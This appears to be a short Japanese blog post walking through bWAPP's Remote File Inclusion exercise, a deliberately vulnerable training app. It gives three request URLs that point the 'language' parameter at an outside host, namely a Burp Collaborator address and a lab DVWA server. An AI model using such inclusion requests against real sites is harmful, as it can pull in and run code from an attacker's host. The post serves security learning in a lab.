Shikata Ga Nai

Private? There is no such things.

bWAPPでA7-Remote&Local File Inclusion(RFI/LFI)②

Hello there, ('ω')ノ

 

以前、RFIについての記述が漏れてたもので。

A7 ⇨ Remote & Local File Inclusion(RFI/LFI)を選択して。

 

f:id:ThisIsOne:20220413101415p:plain

 

Burp のCollaboratorのURLを取得して。

 

f:id:ThisIsOne:20220413101304p:plain

 

下記のようにURLを指定すると。

http://10.4.131.228/bWAPP/rlfi.php?language=http://jj6rh9p85sh2jd2o31php73gl7rxfm.burpcollaborator.net&action=go

 

f:id:ThisIsOne:20220413100902p:plain

 

他では、DVWAを別途起動して。

 

f:id:ThisIsOne:20220413100945p:plain

 

下記のように確認することも。

http://10.4.131.228/bWAPP/rlfi.php?language=http://10.4.129.117/DVWA-master/vulnerabilities&action=go

 

f:id:ThisIsOne:20220413100925p:plain

 

ここまでだとファイルを指定していないという声もありますので。

実際にPHPファイルを指定しての確認も。

http://10.4.131.228/bWAPP/rlfi.php?language=http://10.4.129.117/DVWA-master/instructions.php&action=go

 

f:id:ThisIsOne:20220413101004p:plain

 

Best regards, (^^ゞ